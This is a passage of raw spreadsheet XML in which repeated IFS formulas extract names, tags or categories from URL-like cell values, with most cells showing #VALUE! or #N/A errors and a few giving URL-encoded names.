    <row r="3100" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3100" t="s">
        <v>2672</v>
      </c>
      <c r="B3100" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3100" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3100" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3100" t="e" cm="1">
        <f t="array" ref="E3100">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3100)), MID($A3100, FIND("name=",$A3100) + 5, LEN($A3100) - FIND("name=",$A3100)),
    ISNUMBER(FIND("tag/",$A3100)), MID($A3100, FIND("tag/",$A3100) + 4, LEN($A3100) - FIND("tag/",$A3100)),
    ISNUMBER(FIND("category",$A3100)), MID($A3100, FIND("category",$A3100) + 9, LEN($A3100) - FIND("category",$A3100)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3100" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3101" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3101" t="s">
        <v>2673</v>
      </c>
      <c r="B3101" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3101" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3101" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3101" t="e" cm="1">
        <f t="array" ref="E3101">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3101)), MID($A3101, FIND("name=",$A3101) + 5, LEN($A3101) - FIND("name=",$A3101)),
    ISNUMBER(FIND("tag/",$A3101)), MID($A3101, FIND("tag/",$A3101) + 4, LEN($A3101) - FIND("tag/",$A3101)),
    ISNUMBER(FIND("category",$A3101)), MID($A3101, FIND("category",$A3101) + 9, LEN($A3101) - FIND("category",$A3101)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3101" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3102" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3102" t="s">
        <v>2674</v>
      </c>
      <c r="B3102" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3102" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3102" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3102" t="e" cm="1">
        <f t="array" ref="E3102">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3102)), MID($A3102, FIND("name=",$A3102) + 5, LEN($A3102) - FIND("name=",$A3102)),
    ISNUMBER(FIND("tag/",$A3102)), MID($A3102, FIND("tag/",$A3102) + 4, LEN($A3102) - FIND("tag/",$A3102)),
    ISNUMBER(FIND("category",$A3102)), MID($A3102, FIND("category",$A3102) + 9, LEN($A3102) - FIND("category",$A3102)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3102" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3103" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3103" t="s">
        <v>2675</v>
      </c>
      <c r="B3103" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3103" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3103" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3103" t="e" cm="1">
        <f t="array" ref="E3103">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3103)), MID($A3103, FIND("name=",$A3103) + 5, LEN($A3103) - FIND("name=",$A3103)),
    ISNUMBER(FIND("tag/",$A3103)), MID($A3103, FIND("tag/",$A3103) + 4, LEN($A3103) - FIND("tag/",$A3103)),
    ISNUMBER(FIND("category",$A3103)), MID($A3103, FIND("category",$A3103) + 9, LEN($A3103) - FIND("category",$A3103)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3103" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3104" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3104" t="s">
        <v>2676</v>
      </c>
      <c r="B3104" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3104" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3104" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3104" t="e" cm="1">
        <f t="array" ref="E3104">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3104)), MID($A3104, FIND("name=",$A3104) + 5, LEN($A3104) - FIND("name=",$A3104)),
    ISNUMBER(FIND("tag/",$A3104)), MID($A3104, FIND("tag/",$A3104) + 4, LEN($A3104) - FIND("tag/",$A3104)),
    ISNUMBER(FIND("category",$A3104)), MID($A3104, FIND("category",$A3104) + 9, LEN($A3104) - FIND("category",$A3104)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3104" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3105" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3105" t="s">
        <v>2677</v>
      </c>
      <c r="B3105" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3105" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3105" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3105" t="e" cm="1">
        <f t="array" ref="E3105">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3105)), MID($A3105, FIND("name=",$A3105) + 5, LEN($A3105) - FIND("name=",$A3105)),
    ISNUMBER(FIND("tag/",$A3105)), MID($A3105, FIND("tag/",$A3105) + 4, LEN($A3105) - FIND("tag/",$A3105)),
    ISNUMBER(FIND("category",$A3105)), MID($A3105, FIND("category",$A3105) + 9, LEN($A3105) - FIND("category",$A3105)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3105" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3106" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3106" t="s">
        <v>2678</v>
      </c>
      <c r="B3106" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3106" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3106" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3106" t="e" cm="1">
        <f t="array" ref="E3106">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3106)), MID($A3106, FIND("name=",$A3106) + 5, LEN($A3106) - FIND("name=",$A3106)),
    ISNUMBER(FIND("tag/",$A3106)), MID($A3106, FIND("tag/",$A3106) + 4, LEN($A3106) - FIND("tag/",$A3106)),
    ISNUMBER(FIND("category",$A3106)), MID($A3106, FIND("category",$A3106) + 9, LEN($A3106) - FIND("category",$A3106)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3106" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3107" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3107" t="s">
        <v>2685</v>
      </c>
      <c r="B3107" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3107" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3107" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3107" t="e" cm="1">
        <f t="array" ref="E3107">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3107)), MID($A3107, FIND("name=",$A3107) + 5, LEN($A3107) - FIND("name=",$A3107)),
    ISNUMBER(FIND("tag/",$A3107)), MID($A3107, FIND("tag/",$A3107) + 4, LEN($A3107) - FIND("tag/",$A3107)),
    ISNUMBER(FIND("category",$A3107)), MID($A3107, FIND("category",$A3107) + 9, LEN($A3107) - FIND("category",$A3107)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3107" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3108" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3108" t="s">
        <v>2689</v>
      </c>
      <c r="B3108" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3108" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3108" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3108" t="e" cm="1">
        <f t="array" ref="E3108">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3108)), MID($A3108, FIND("name=",$A3108) + 5, LEN($A3108) - FIND("name=",$A3108)),
    ISNUMBER(FIND("tag/",$A3108)), MID($A3108, FIND("tag/",$A3108) + 4, LEN($A3108) - FIND("tag/",$A3108)),
    ISNUMBER(FIND("category",$A3108)), MID($A3108, FIND("category",$A3108) + 9, LEN($A3108) - FIND("category",$A3108)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3108" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3109" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3109" t="s">
        <v>2690</v>
      </c>
      <c r="B3109" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3109" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3109" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3109" t="e" cm="1">
        <f t="array" ref="E3109">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3109)), MID($A3109, FIND("name=",$A3109) + 5, LEN($A3109) - FIND("name=",$A3109)),
    ISNUMBER(FIND("tag/",$A3109)), MID($A3109, FIND("tag/",$A3109) + 4, LEN($A3109) - FIND("tag/",$A3109)),
    ISNUMBER(FIND("category",$A3109)), MID($A3109, FIND("category",$A3109) + 9, LEN($A3109) - FIND("category",$A3109)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3109" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3110" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3110" t="s">
        <v>2691</v>
      </c>
      <c r="B3110" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3110" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3110" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3110" t="e" cm="1">
        <f t="array" ref="E3110">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3110)), MID($A3110, FIND("name=",$A3110) + 5, LEN($A3110) - FIND("name=",$A3110)),
    ISNUMBER(FIND("tag/",$A3110)), MID($A3110, FIND("tag/",$A3110) + 4, LEN($A3110) - FIND("tag/",$A3110)),
    ISNUMBER(FIND("category",$A3110)), MID($A3110, FIND("category",$A3110) + 9, LEN($A3110) - FIND("category",$A3110)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3110" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3111" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3111" t="s">
        <v>2692</v>
      </c>
      <c r="B3111" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3111" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3111" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3111" t="e" cm="1">
        <f t="array" ref="E3111">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3111)), MID($A3111, FIND("name=",$A3111) + 5, LEN($A3111) - FIND("name=",$A3111)),
    ISNUMBER(FIND("tag/",$A3111)), MID($A3111, FIND("tag/",$A3111) + 4, LEN($A3111) - FIND("tag/",$A3111)),
    ISNUMBER(FIND("category",$A3111)), MID($A3111, FIND("category",$A3111) + 9, LEN($A3111) - FIND("category",$A3111)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3111" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3112" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3112" t="s">
        <v>2346</v>
      </c>
      <c r="B3112" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3112" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3112" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3112" t="e" cm="1">
        <f t="array" ref="E3112">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3112)), MID($A3112, FIND("name=",$A3112) + 5, LEN($A3112) - FIND("name=",$A3112)),
    ISNUMBER(FIND("tag/",$A3112)), MID($A3112, FIND("tag/",$A3112) + 4, LEN($A3112) - FIND("tag/",$A3112)),
    ISNUMBER(FIND("category",$A3112)), MID($A3112, FIND("category",$A3112) + 9, LEN($A3112) - FIND("category",$A3112)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3112" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3113" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3113" t="s">
        <v>2822</v>
      </c>
      <c r="B3113" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3113" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3113" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3113" t="e" cm="1">
        <f t="array" ref="E3113">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3113)), MID($A3113, FIND("name=",$A3113) + 5, LEN($A3113) - FIND("name=",$A3113)),
    ISNUMBER(FIND("tag/",$A3113)), MID($A3113, FIND("tag/",$A3113) + 4, LEN($A3113) - FIND("tag/",$A3113)),
    ISNUMBER(FIND("category",$A3113)), MID($A3113, FIND("category",$A3113) + 9, LEN($A3113) - FIND("category",$A3113)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3113" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3114" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3114" t="s">
        <v>2823</v>
      </c>
      <c r="B3114" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3114" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3114" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3114" t="e" cm="1">
        <f t="array" ref="E3114">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3114)), MID($A3114, FIND("name=",$A3114) + 5, LEN($A3114) - FIND("name=",$A3114)),
    ISNUMBER(FIND("tag/",$A3114)), MID($A3114, FIND("tag/",$A3114) + 4, LEN($A3114) - FIND("tag/",$A3114)),
    ISNUMBER(FIND("category",$A3114)), MID($A3114, FIND("category",$A3114) + 9, LEN($A3114) - FIND("category",$A3114)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3114" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3115" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3115" t="s">
        <v>2824</v>
      </c>
      <c r="B3115" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3115" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3115" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3115" t="e" cm="1">
        <f t="array" ref="E3115">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3115)), MID($A3115, FIND("name=",$A3115) + 5, LEN($A3115) - FIND("name=",$A3115)),
    ISNUMBER(FIND("tag/",$A3115)), MID($A3115, FIND("tag/",$A3115) + 4, LEN($A3115) - FIND("tag/",$A3115)),
    ISNUMBER(FIND("category",$A3115)), MID($A3115, FIND("category",$A3115) + 9, LEN($A3115) - FIND("category",$A3115)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3115" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3116" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3116" t="s">
        <v>2601</v>
      </c>
      <c r="B3116" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3116" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3116" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3116" t="e" cm="1">
        <f t="array" ref="E3116">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3116)), MID($A3116, FIND("name=",$A3116) + 5, LEN($A3116) - FIND("name=",$A3116)),
    ISNUMBER(FIND("tag/",$A3116)), MID($A3116, FIND("tag/",$A3116) + 4, LEN($A3116) - FIND("tag/",$A3116)),
    ISNUMBER(FIND("category",$A3116)), MID($A3116, FIND("category",$A3116) + 9, LEN($A3116) - FIND("category",$A3116)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3116" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3117" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3117" t="s">
        <v>2248</v>
      </c>
      <c r="B3117" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3117" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3117" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3117" t="e" cm="1">
        <f t="array" ref="E3117">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3117)), MID($A3117, FIND("name=",$A3117) + 5, LEN($A3117) - FIND("name=",$A3117)),
    ISNUMBER(FIND("tag/",$A3117)), MID($A3117, FIND("tag/",$A3117) + 4, LEN($A3117) - FIND("tag/",$A3117)),
    ISNUMBER(FIND("category",$A3117)), MID($A3117, FIND("category",$A3117) + 9, LEN($A3117) - FIND("category",$A3117)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3117" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3118" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3118" t="s">
        <v>2248</v>
      </c>
      <c r="B3118" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3118" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3118" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3118" t="e" cm="1">
        <f t="array" ref="E3118">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3118)), MID($A3118, FIND("name=",$A3118) + 5, LEN($A3118) - FIND("name=",$A3118)),
    ISNUMBER(FIND("tag/",$A3118)), MID($A3118, FIND("tag/",$A3118) + 4, LEN($A3118) - FIND("tag/",$A3118)),
    ISNUMBER(FIND("category",$A3118)), MID($A3118, FIND("category",$A3118) + 9, LEN($A3118) - FIND("category",$A3118)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3118" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3119" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3119" t="s">
        <v>2248</v>
      </c>
      <c r="B3119" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3119" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3119" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3119" t="e" cm="1">
        <f t="array" ref="E3119">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3119)), MID($A3119, FIND("name=",$A3119) + 5, LEN($A3119) - FIND("name=",$A3119)),
    ISNUMBER(FIND("tag/",$A3119)), MID($A3119, FIND("tag/",$A3119) + 4, LEN($A3119) - FIND("tag/",$A3119)),
    ISNUMBER(FIND("category",$A3119)), MID($A3119, FIND("category",$A3119) + 9, LEN($A3119) - FIND("category",$A3119)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3119" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3120" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3120" t="s">
        <v>2248</v>
      </c>
      <c r="B3120" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3120" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3120" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3120" t="e" cm="1">
        <f t="array" ref="E3120">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3120)), MID($A3120, FIND("name=",$A3120) + 5, LEN($A3120) - FIND("name=",$A3120)),
    ISNUMBER(FIND("tag/",$A3120)), MID($A3120, FIND("tag/",$A3120) + 4, LEN($A3120) - FIND("tag/",$A3120)),
    ISNUMBER(FIND("category",$A3120)), MID($A3120, FIND("category",$A3120) + 9, LEN($A3120) - FIND("category",$A3120)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3120" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3121" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3121" t="s">
        <v>2248</v>
      </c>
      <c r="B3121" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3121" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3121" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3121" t="e" cm="1">
        <f t="array" ref="E3121">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3121)), MID($A3121, FIND("name=",$A3121) + 5, LEN($A3121) - FIND("name=",$A3121)),
    ISNUMBER(FIND("tag/",$A3121)), MID($A3121, FIND("tag/",$A3121) + 4, LEN($A3121) - FIND("tag/",$A3121)),
    ISNUMBER(FIND("category",$A3121)), MID($A3121, FIND("category",$A3121) + 9, LEN($A3121) - FIND("category",$A3121)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3121" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3122" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3122" t="s">
        <v>2248</v>
      </c>
      <c r="B3122" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3122" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3122" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3122" t="e" cm="1">
        <f t="array" ref="E3122">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3122)), MID($A3122, FIND("name=",$A3122) + 5, LEN($A3122) - FIND("name=",$A3122)),
    ISNUMBER(FIND("tag/",$A3122)), MID($A3122, FIND("tag/",$A3122) + 4, LEN($A3122) - FIND("tag/",$A3122)),
    ISNUMBER(FIND("category",$A3122)), MID($A3122, FIND("category",$A3122) + 9, LEN($A3122) - FIND("category",$A3122)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3122" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3123" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3123" t="s">
        <v>2248</v>
      </c>
      <c r="B3123" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3123" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3123" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3123" t="e" cm="1">
        <f t="array" ref="E3123">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3123)), MID($A3123, FIND("name=",$A3123) + 5, LEN($A3123) - FIND("name=",$A3123)),
    ISNUMBER(FIND("tag/",$A3123)), MID($A3123, FIND("tag/",$A3123) + 4, LEN($A3123) - FIND("tag/",$A3123)),
    ISNUMBER(FIND("category",$A3123)), MID($A3123, FIND("category",$A3123) + 9, LEN($A3123) - FIND("category",$A3123)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3123" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3124" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3124" t="s">
        <v>2818</v>
      </c>
      <c r="B3124" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3124" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3124" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3124" t="e" cm="1">
        <f t="array" ref="E3124">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3124)), MID($A3124, FIND("name=",$A3124) + 5, LEN($A3124) - FIND("name=",$A3124)),
    ISNUMBER(FIND("tag/",$A3124)), MID($A3124, FIND("tag/",$A3124) + 4, LEN($A3124) - FIND("tag/",$A3124)),
    ISNUMBER(FIND("category",$A3124)), MID($A3124, FIND("category",$A3124) + 9, LEN($A3124) - FIND("category",$A3124)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3124" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3125" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3125" t="s">
        <v>2825</v>
      </c>
      <c r="B3125" t="str">
        <f t="shared" si="145"/>
        <v>Style%20With%20Plixxi</v>
      </c>
      <c r="C3125" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3125" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3125" t="str" cm="1">
        <f t="array" ref="E3125">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3125)), MID($A3125, FIND("name=",$A3125) + 5, LEN($A3125) - FIND("name=",$A3125)),
    ISNUMBER(FIND("tag/",$A3125)), MID($A3125, FIND("tag/",$A3125) + 4, LEN($A3125) - FIND("tag/",$A3125)),
    ISNUMBER(FIND("category",$A3125)), MID($A3125, FIND("category",$A3125) + 9, LEN($A3125) - FIND("category",$A3125)))</f>
        <v>Style%20With%20Plixxi</v>
      </c>
      <c r="F3125" t="s">
        <v>3302</v>
      </c>
    </row>
    <row r="3126" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3126" t="s">
        <v>2826</v>
      </c>
      <c r="B3126" t="str">
        <f t="shared" si="145"/>
        <v>Sumi%20Chitra%2037</v>
      </c>
      <c r="C3126" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3126" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3126" t="str" cm="1">
        <f t="array" ref="E3126">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3126)), MID($A3126, FIND("name=",$A3126) + 5, LEN($A3126) - FIND("name=",$A3126)),
    ISNUMBER(FIND("tag/",$A3126)), MID($A3126, FIND("tag/",$A3126) + 4, LEN($A3126) - FIND("tag/",$A3126)),
    ISNUMBER(FIND("category",$A3126)), MID($A3126, FIND("category",$A3126) + 9, LEN($A3126) - FIND("category",$A3126)))</f>
        <v>Sumi%20Chitra%2037</v>
      </c>
      <c r="F3126" t="s">
        <v>3380</v>
      </c>
    </row>
    <row r="3127" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3127" t="s">
        <v>2826</v>
      </c>
      <c r="B3127" t="str">
        <f t="shared" si="145"/>
        <v>Sumi%20Chitra%2037</v>
      </c>
      <c r="C3127" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3127" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3127" t="str" cm="1">
        <f t="array" ref="E3127">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3127)), MID($A3127, FIND("name=",$A3127) + 5, LEN($A3127) - FIND("name=",$A3127)),
    ISNUMBER(FIND("tag/",$A3127)), MID($A3127, FIND("tag/",$A3127) + 4, LEN($A3127) - FIND("tag/",$A3127)),
    ISNUMBER(FIND("category",$A3127)), MID($A3127, FIND("category",$A3127) + 9, LEN($A3127) - FIND("category",$A3127)))</f>
        <v>Sumi%20Chitra%2037</v>
      </c>
      <c r="F3127" t="s">
        <v>3380</v>
      </c>
    </row>
    <row r="3128" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3128" t="s">
        <v>2601</v>
      </c>
      <c r="B3128" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3128" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3128" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3128" t="e" cm="1">
        <f t="array" ref="E3128">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3128)), MID($A3128, FIND("name=",$A3128) + 5, LEN($A3128) - FIND("name=",$A3128)),
    ISNUMBER(FIND("tag/",$A3128)), MID($A3128, FIND("tag/",$A3128) + 4, LEN($A3128) - FIND("tag/",$A3128)),
    ISNUMBER(FIND("category",$A3128)), MID($A3128, FIND("category",$A3128) + 9, LEN($A3128) - FIND("category",$A3128)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3128" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3129" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3129" t="s">
        <v>2248</v>
      </c>
      <c r="B3129" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3129" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3129" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3129" t="e" cm="1">
